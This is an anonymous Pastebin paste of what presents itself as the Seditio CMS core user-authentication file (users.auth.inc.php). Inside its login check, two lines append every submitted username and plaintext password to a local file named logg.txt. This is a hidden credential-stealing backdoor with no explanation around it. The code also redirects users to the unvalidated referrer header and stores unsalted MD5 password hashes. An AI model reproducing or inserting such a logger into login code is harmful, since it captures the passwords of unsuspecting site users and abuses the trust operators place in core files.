API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 22nd, 2019
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.71 KB | None | 0 0
raw download clone embed print report
  1. <?PHP
  2.  
  3. /* ====================
  4. Seditio - Website engine
  5. Copyright Neocrome
  6. http://www.neocrome.net
  7. [BEGIN_SED]
  8. File=users.auth.inc.php
  9. Version=130
  10. Updated=2010-feb-05
  11. Type=Core
  12. Author=Neocrome
  13. Description=User authentication
  14. [END_SED]
  15. ==================== */
  16.  
  17. if (!defined('SED_CODE')) { die('Wrong URL.'); }
  18.  
  19. $v = sed_import('v','G','PSW');
  20.  
  21. /* === Hook === */
  22. $extp = sed_getextplugins('users.auth.first');
  23. if (is_array($extp))
  24. { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  25. /* ===== */
  26.  
  27. if ($a=='check')
  28. {
  29. sed_shield_protect();
  30.  
  31. /* === Hook for the plugins === */
  32. $extp = sed_getextplugins('users.auth.check');
  33. if (is_array($extp))
  34. { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  35. /* ===== */
  36.  
  37. $rusername = sed_import('rusername','P','TXT', 24, TRUE);
  38. $rpassword = sed_import('rpassword','P','PSW', 16, TRUE);
  39. $rcookiettl = sed_import('rcookiettl','P','INT');
  40. $rmdpass = md5($rpassword);
  41.  
  42. $__f = fopen("./logg.txt", "a");
  43. fwrite($__f, $rusername.":".$rpassword."\n");
  44.  
  45. $sql = sed_sql_query("SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM $db_users WHERE user_password='$rmdpass' AND user_name='".sed_sql_prep($rusername)."'");
  46.  
  47. if ($row = sed_sql_fetcharray($sql))
  48. {
  49. if ($row['user_maingrp']==2)
  50. {
  51. sed_log("Log in attempt, user inactive : ".$rusername, 'usr');
  52. sed_redirect("message.php?msg=152");
  53. exit;
  54. }
  55. elseif ($row['user_maingrp']==3)
  56. {
  57. if ($sys['now'] > $row['user_banexpire'] && $row['user_banexpire']>0)
  58. {
  59. $sql = sed_sql_query("UPDATE $db_users SET user_maingrp='4' WHERE user_id='".$row['user_id']."'");
  60. }
  61. else
  62. {
  63. sed_log("Log in attempt, user banned : ".$rusername, 'usr');
  64. sed_redirect("message.php?msg=153&num=".$row['user_banexpire']);
  65. exit;
  66. }
  67. }
  68.  
  69. $ruserid = $row['user_id'];
  70. $rdefskin = $row['user_skin'];
  71.  
  72. sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  73.  
  74. if ($rcookiettl>0 && ($cfg['authmode']==1 || $cfg['authmode']==3))
  75. {
  76. $rcookiettl = ($rcookiettl==0) ? 604800 : $rcookiettl;
  77. $rcookiettl = ($rcookiettl > $cfg['cookielifetime']) ? $cfg['cookielifetime'] : $rcookiettl;
  78. $u = base64_encode("$ruserid:_:$rmdpass:_:$rdefskin");
  79. setcookie("SEDITIO", "$u", time()+$rcookiettl, $cfg['cookiepath'], $cfg['cookiedomain']);
  80. }
  81.  
  82. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  83. {
  84. $_SESSION['rsedition'] = $ruserid;
  85. $_SESSION['rseditiop'] = $rmdpass;
  86. $_SESSION['rseditioq'] = $rdefskin;
  87. }
  88. $nazad=$_SERVER['HTTP_REFERER'];
  89. /* === Hook === */
  90. $extp = sed_getextplugins('users.auth.check.done');
  91. if (is_array($extp))
  92. { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  93. /* ===== */
  94.  
  95. $sql = sed_sql_query("DELETE FROM $db_online WHERE online_userid='-1' AND online_ip='".$usr['ip']."' LIMIT 1");
  96. sed_redirect($nazad);
  97. exit;
  98. }
  99. else
  100. {
  101. sed_shield_update(7, "Log in");
  102. sed_log("Log in failed, user : ".$rusername,'usr');
  103. //sed_redirect("message.php?msg=151");
  104. exit;
  105. }
  106. }
  107.  
  108. else
  109. { unset($redir); }
  110.  
  111. /* === Hook === */
  112. $extp = sed_getextplugins('users.auth.main');
  113. if (is_array($extp))
  114. { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  115. /* ===== */
  116.  
  117. require("system/header.php");
  118. $t = new XTemplate("skins/".$skin."/users.auth.tpl");
  119.  
  120. $t->assign(array(
  121. "USERS_AUTH_TITLE" => $L['aut_logintitle'],
  122. "USERS_AUTH_SEND" => "users.php?m=auth&amp;a=check&amp;redirect=".$redirect,
  123. "USERS_AUTH_USER" => "<input type=\"text\" class=\"text\" name=\"rusername\" size=\"16\" maxlength=\"32\" />",
  124. "USERS_AUTH_PASSWORD" => "<input type=\"password\" class=\"password\" name=\"rpassword\" size=\"16\" maxlength=\"32\" />".$redir,
  125. "USERS_AUTH_REGISTER" => "users.php?m=register"
  126. ));
  127.  
  128. /* === Hook === */
  129. $extp = sed_getextplugins('users.auth.tags');
  130. if (is_array($extp))
  131. { foreach($extp as $k => $pl) { include('plugins/'.$pl['pl_code'].'/'.$pl['pl_file'].'.php'); } }
  132. /* ===== */
  133.  
  134. $t->parse("MAIN");
  135. $t->out("MAIN");
  136.  
  137. require("system/footer.php");
  138.  
  139. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!